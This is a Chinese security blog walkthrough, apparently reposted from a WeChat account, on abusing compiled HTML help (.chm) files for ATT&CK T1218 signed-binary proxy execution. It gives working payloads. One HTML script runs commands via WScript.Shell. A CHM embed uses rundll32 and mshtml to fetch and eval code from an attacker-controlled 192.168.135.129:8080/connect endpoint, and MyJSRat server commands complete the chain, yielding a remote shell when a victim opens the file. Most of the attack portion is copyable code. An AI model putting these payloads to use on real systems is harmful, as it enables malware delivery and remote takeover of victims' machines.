MITRE ATT&CK T1218 签名二进制代理执行
签名二进制文件,即使用受信任的数字证书签名的二进制文件,可以在受数字签名验证和应用程序控制保护的 Windows 操作系统上执行。然而,攻击者经常滥用这些合法的二进制文件来逃避安全控制。这些二进制文件也称为离地二进制文件( LOLBins )。
什么是签名二进制代理执行?
术语“签名二进制代理执行”是指通过使用另一个使用可信数字证书签名的可执行文件来执行命令或可执行文件的过程。攻击者利用签名可执行文件的信任来逃避防御机制。攻击者可能会滥用编译的 HTML 文件 (.chm) 来隐藏恶意代码。CHM 文件通常作为 Microsoft HTML 帮助系统的一部分分发。CHM 文件是各种内容的压缩编译,例如 HTML 文档、图像和脚本/Web 相关的编程语言,例如 VBA、JScript、Java 和 ActiveX。CHM 内容使用由 HTML 帮助可执行程序 (hh.exe) 加载的 Internet Explorer 浏览器。
为了实验达到真实效果
实验环境:windows server12
受害者环境:windows 10
实验工具:EasyCHM 3.9.3
准备好一个代码执行的HTML
<!DOCTYPE html><html lang="en"><head><meta charset="UTF-8"><title>title</title><script type="text/javascript">var objShellvar objShell= new ActiveXObject("WScript.Shell")var iReturnCode=objShell.Run("calc.exe",0,true)</script></head><body></body></html>
var iReturnCode=objShell.Run("calc.exe",0,true) #可自行修改其它准备好通过创建一个文件夹,在把写好的html放到夹里面。
那么在打开EAsy CHM,点击新建,在添加我们创建的文件夹路径,这个是使用路径来识别这个文件的。
点击添加确定后,自动会识别到文件下的html文件。
下面我们进行编译。
在较老的 Microsoft Windows 版本中,CHM 内容使用通过HTML 帮助可执行程序 ( hh.exe )加载的底层 Internet Explorer 浏览器组件显示。当用户单击 CHM 文件或在Help Viewer中打开帮助文件的菜单项时,将启动 HTML Help 可执行程序 (hh.exe) 。hh.exe 调用HTML 帮助 ActiveX 控件,该控件显示帮助文件并为用户提供导航和其他功能。
然而,这种方法需要高水平的用户交互。首先,用户必须打开恶意 CHM 文件,然后在 JavaScript 弹出窗口中单击“确定”,最后在 ActiveX 安全警告上单击“是”。
OK弹窗成功。
GET shell
https://github.com/Soldie/MyJSRat(python 2)
获取内外网地址IP
python2 MyJSRat.py -fJSRat ServerBy: Evi1cg[Checking IP....][*] Internal IP: 192.168.135.129[ERROR] Problem resolving extrernal IP![*] External IP: Problem resolving extrernal IP!
直接执行命令
┌──(root㉿kali)-[~/Desktop/MyJSRat-master]└─# python2 MyJSRat.py -i 192.168.135.129 -p 8080 -c "whoami"
* http://192.168.1.101:8080/connect 默认回连地址
* http://192.168.1.101:8080/wtf 访问此链接获取客户端执行代码
* http://192.168.1.101:8080/hook 浏览器hook链接,适用于某些版本的IE
访问URL:获取负载
复制到CHM进行斌编译
<html><head><title>Mousejack replay</title></head><body>command exec<OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1><PARAM name="Command" value="ShortCut"><PARAM name="Button" value="Bitmap::shortcut"><PARAM name="Item1" value=',rundll32.exe,javascript:"..mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://192.168.135.129:8080/connect",false);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);}'><PARAM name="Item2" value="273,1,1"></OBJECT><SCRIPT>x.Click();</SCRIPT></body></html>
保存-编译
打开点击1.CHM文件 - 其实打开这个CHM文件Shell就上线了
打开的时候会卡顿一下
出现JSRat说明成功了
参考:
Silence 组织通过恶意 CHM 针对俄罗斯银行
https://reaqta.com/2019/01/silence-group-targeting-russian-banks/
推荐文章
原文始发于微信公众号(Ots安全):ATT&CK 防御逃逸 - Windows Matrix 之签名二进制代理执行: 编译的 HTML 文件
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论